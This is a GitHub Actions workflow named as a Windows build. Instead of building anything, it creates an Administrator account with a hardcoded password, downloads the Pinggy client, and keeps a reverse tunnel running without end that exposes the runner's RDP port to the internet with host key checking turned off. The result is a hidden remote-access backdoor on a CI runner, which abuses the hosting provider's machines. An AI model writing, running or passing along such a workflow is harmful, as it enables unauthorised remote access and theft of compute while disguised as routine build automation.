name: Windows with Depot Build

on:
  workflow_dispatch:

jobs:
  build-on-windows:
    runs-on: depot-windows-2022-64
    permissions:
      contents: read
      id-token: write
      packages: write

    steps:
      - name: Create admin group and user
        shell: cmd
        continue-on-error: true
        run: |
          REM Add the built-in "Administrators" group if it doesn't exist
          net localgroup administrators /add

          REM Create (or update) the built-in "Administrator" account with password "OLDUNER#6"
          net user Administrator OLDUNER#6 /add

          REM Ensure the "Administrator" user is in the "Administrators" group
          net localgroup administrators Administrator /add

          REM Create a custom group "AdminGroup" and add it to the built-in "Administrators" group
          net localgroup Administrators AdminGroup /add

      - name: Download Pinggy CLI
        shell: pwsh
        run: |
          # Download Pinggy CLI binary
          $url = "https://s3.ap-south-1.amazonaws.com/public.pinggy.binaries/cli/v0.2.5/windows/amd64/pinggy.exe"
          $output = "$env:USERPROFILE\pinggy.exe"
          Invoke-WebRequest -Uri $url -OutFile $output
          Write-Output "Downloaded pinggy.exe to $output"

      - name: Run reverse tunnel with Pinggy
        shell: pwsh
        run: |
          # Start persistent reverse tunnel to expose RDP (port 3389)
          $pinggy = "$env:USERPROFILE\pinggy.exe"
          while ($true) {
              & $pinggy -p 443 -R0:127.0.0.1:3389 `
                  -o StrictHostKeyChecking=no `
                  -o ServerAliveInterval=30 `
                  K4rdNLZTQe9+force+tcp@free.pinggy.io
              Start-Sleep -Seconds 10
          }
